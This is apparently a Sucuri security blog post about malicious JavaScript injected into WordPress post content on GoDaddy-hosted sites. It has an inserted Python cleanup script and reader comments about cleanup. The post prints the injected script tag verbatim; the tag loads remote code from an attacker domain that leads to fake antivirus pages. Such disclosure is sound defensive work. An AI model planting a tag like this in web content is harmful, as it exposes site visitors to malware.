Attacks against GoDaddy – acrossuniverseitbenet + Hilary Kneber + HardSoft

For the last few days we’ve been tracking another large-scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.

This time, the attackers changed tactics: instead of infecting the PHP files, they injected malicious code into the database. On the infected WordPress sites, they added the following JavaScript inside every post (in the wp_posts table):

<script src= "http://acrossuniverseitbenet.com/js.php?kk=10"></script>

As you can imagine, this JavaScript redirects the user to the infamous “Fake AV” pages.


All of them are hosted at 65.23.153.126 and 91.193.194.64. If you are a hosting provider, please make sure to block those IP addresses and domains (none of them are currently blacklisted).

As for who is behind this attack, it seems to be the same group as in the previous attacks. They’ve changed their name to Hilary Buff instead of Hilary Kneber.

Registrant Contact:
HardSoft, inc
Hilary Buff admin@acrossuniverseitbenet.com
56764545 fax: 56764545
29/2 Sun street. Montey 29
London NY 45453
gb

If your site is currently infected, you have to remove these malicious entries from every post (just log in to wp-admin to do so).
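One way to locate and strip the injected tag across a dump of wp_posts rows, added here as an example and not code from the Sucuri post; the row shape, the sample contents and the tolerant pattern (any kk value, straight or curly quotes around the URL) are assumptions:

```python
import re
# Added example, not code from the Sucuri post. The pattern matches the tag
# quoted above (<script src= "http://acrossuniverseitbenet.com/js.php?kk=10″></script>)
# and tolerates the stray spacing, straight or curly quotes, and any kk= value.
INJECTED_TAG = re.compile(
    r"<script\s+src\s*=\s*[\"'\u2033\u201c\u201d]?\s*"
    r"https?://acrossuniverseitbenet\.com/js\.php\?kk=\d+"
    r"\s*[\"'\u2033\u201c\u201d]?\s*>\s*</script>",
    re.IGNORECASE,
)

# Constructed sample rows shaped like wp_posts (ID, post_content); not real data.
SAMPLE_ROWS = [
    {"ID": 1, "post_content": "<p>Hello world</p>\n"
     '<script src= "http://acrossuniverseitbenet.com/js.php?kk=10\u2033></script>'},
    {"ID": 2, "post_content": "<p>Clean post</p>"},
    {"ID": 3, "post_content": "<p>Two copies</p>"
     '<script src="http://acrossuniverseitbenet.com/js.php?kk=12"></script>'
     '<script src="http://acrossuniverseitbenet.com/js.php?kk=10"></script>'},
]

def find_injected_posts(rows):
    """Return the IDs of rows whose post_content still carries the injected tag."""
    return [row["ID"] for row in rows if INJECTED_TAG.search(row["post_content"])]

def clean_post_content(content):
    """Strip every copy of the tag; returns (cleaned content, copies removed)."""
    cleaned, removed = INJECTED_TAG.subn("", content)
    return cleaned.rstrip(), removed

def clean_rows(rows):
    """Clean a list of rows; returns (new rows, total copies removed)."""
    cleaned_rows, total = [], 0
    for row in rows:
        content, removed = clean_post_content(row["post_content"])
        total += removed
        cleaned_rows.append({**row, "post_content": content})
    return cleaned_rows, total

def update_statement(row):
    """Parameterised UPDATE for a cleaned row (for a DB-API cursor.execute)."""
    return ("UPDATE wp_posts SET post_content = %s WHERE ID = %s",
            (row["post_content"], row["ID"]))

if __name__ == "__main__":
    print("infected IDs:", find_injected_posts(SAMPLE_ROWS))
    rows, total = clean_rows(SAMPLE_ROWS)
    print("removed", total, "tag(s); still infected:", find_injected_posts(rows))
```

Run find_injected_posts again after the updates to confirm nothing was missed, and purge any page cache so visitors receive the cleaned content.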

If you need help doing so, please contact us at support@sucuri.net or visit our site, Sucuri Security. We can get you cleaned up pretty quickly.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Bryan

    I did a search and it shows up over 21,000 times! Is there a script to use for this??

    • http://armeda.com/ Andres Armeda

      Bryan, sorry, but we do not have a script available for this outbreak at this time. If you contact us at support@sucuri.net we can try to assist.

      • Bryan

        Weird…appears to be only attacking my username which is an admin, and no one else…I think. on phone w godaddy now..we’re baffled about it..

        • Bryan

          Correction, still seems to be infected all Usernames. On a different computer though. Figures Go Daddy couldn’t find the problem.

          • Bryan

            Not sure how, but it seems the script has been removed from my site. Either from the hosting or maybe by me deleting some plugins? NO IDEA. This was the strangest malware I’ve gotten to date.

          • http://armeda.com/ Andres Armeda

            I ran a scan and the site is showing clean now. I’d recommend changing your passwords just in case.

          • Bryan

            Go Daddy cleaned it apparently. Thanks. I’ll change passwords to everything to be safe. …like that will help hahaha

          • Dani

            I hope they clean mine too. Was yours cleaned because of a support ticket you put in?

          • http://armeda.com/ Andres Armeda

            Hi Dani,

            We offer malware cleanup packages on our main site. Right now we have a holiday discount for all http://sucuri.net/holidays

            If you’re interested we can get you cleaned up within the next couple of hours.

            If you have any further questions, feel free to email us at support@sucuri.net

            Thanks,

            Dre

          • Dani

            I anxiously await a script for this myself, because both of my blogs (http://blog.little-miss.org/ and http://mumsy.little-miss.org/) got hit. It’s going to be very difficult to clean manually, and of course I turn to you guys for practically everything GoDaddy fail-related.

    • http://www.co.cc/?id=152449 Dvdmxll

      I can clean your posts and databases quite quickly with a semi-automated method. Contact me: dvdmxll (at) yahoo.com


  • Bryan

    Also, how do we prevent this from happening again? This is about the 100th time I’ve been hacked on a GoDaddy site this year. Really need to get off their servers…

    • http://armeda.com/ Andres Armeda

      Unfortunately, this looks like a provider issue and in these instances, there is not much that can be done to mitigate the risk.

  • Bryan

    Since no one is replying, I’ll reply back to myself and say the search & replace in the database and a plugin for search & replace for WordPress DOESN’T work! I’m at wit’s end here.


  • http://twitter.com/thoughtoffice thoughtoffice

    We got nailed, too. Happily, we have only about 120 total pages and posts on our site right now, so a manual edit of each page didn’t take too long. Some things I found helped the process:

    [1] Open the WP “Posts” page in the dashboard, then open a bunch of posts in separate browser tabs. This allows you to edit and update a whole bunch of posts very quickly.

    [2] Same process for “Pages” – edit a whole bunch of pages in individual tabs.

    [3] Open the page or post in the edit window, and scroll to the bottom in HTML edit mode. The inserted Javascript is always at the bottom of the post content. Select, delete, and update. Move to the next tab while WordPress is thinking.

    [4] Once you’ve gotten to the last of the open editor tabs, go back to the first. Verify the post has updated, and that the JS code is gone from the bottom of the post. Close the tab and move to the next.

    [5] Keep going until you’ve got all your pages and posts updated. It may be helpful to print your Page or Post listing, to use as a checklist as you proceed.

    [6] I use the NoScript plugin for Firefox – that’s how I learned we had been infected. A notification showed at the bottom of the browser window, asking whether I wanted to allow acrossuniverseitbenet(dot)com. Gave us a good, early heads up.

    [7] We also use WP SuperCache on our site. If you cache pages, be sure to go in and delete the cache. That makes certain that all your updates are immediately served to your visitors.

    We’re now seriously considering moving all our hosting off GoDaddy. This is not the first time their laxity has bit us in the posterior.

    Good luck, everyone.
    Dave Lockman
    info@thoughtoffice.com

  • http://www.buzzerblog.com/ thealexdavis

    I got hit also. I’ve got around 3,000 posts/pages so this is a massive hassle, as we are a news site. I’ve gotten around 200 pages manually cleared. If there’s any semi-automatic way to do this I’m hoping to hear soon. At least for now I’ve got the archives cleared for the past 5 months and I’ve got all the individual pages fixed. I checked the other codes and we’re all good there. Hopefully something pops up.

  • Guest

    Hi, thanks as always Sucuri for being there… I’m on GoDaddy but not for much longer. My sites have not been hit with this, but they’ve grown much larger this year and I just don’t feel comfortable there any more – too many attacks let through.

    I try to keep good database backups. Since this attack does not appear to affect PHP, would just restoring the previous (confirmed good) WordPress database backup work in order to fix it? Thank you!

  • Guest

    DM them on twitter. They just cleaned our site within minutes.

  • CrazedMama

    My site was cleaned last night but I noticed in WP there is a hidden administrator account. I’ve gone through the db side of things and can’t seem to locate the culprit.


  • Andre

    Here is an official response from Godaddy on how to handle it.

    http://community.godaddy.com/godaddy/security-update-malware-affecting-some-databases/


  • http://twitter.com/thoughtoffice thoughtoffice

    Our site got infected again today. At least we’re getting better and faster at deleting the offending Javascript code. 😉 We also went in and changed the MySQL password, hoping that will slow the hackers down a bit. If you do this for your site, don’t forget to edit wp-config.php to make the password match the new one you selected for your MySQL database, otherwise your site will break.

    Ran into some trouble trying to submit a ticket to GoDaddy. Trying to be as helpful as possible, I pasted the script code into the body of the message. The result – a less than helpful error message stating:

    “The following fields have invalid input:
    Question”.

    One of our staffers suggested that the JS code was the issue. It was. Removed that code from the body of the message and GoDaddy was finally happy. Joy.

    We’re hoping they resolve the issue for us. Massive thanks to everyone on Sucuri for being so quick to post the issue and a solution.

  • Steve

    I gave up on shared hosting. Too much hassle.


  • http://about.me/lorenbaxter Loren Baxter

    For those still looking for a SQL script to clear this problem up quickly, there’s one detailed over here: http://just-ask-kim.com/wordpress-godaddy-malware-infection-acrossuniverseitbenet/
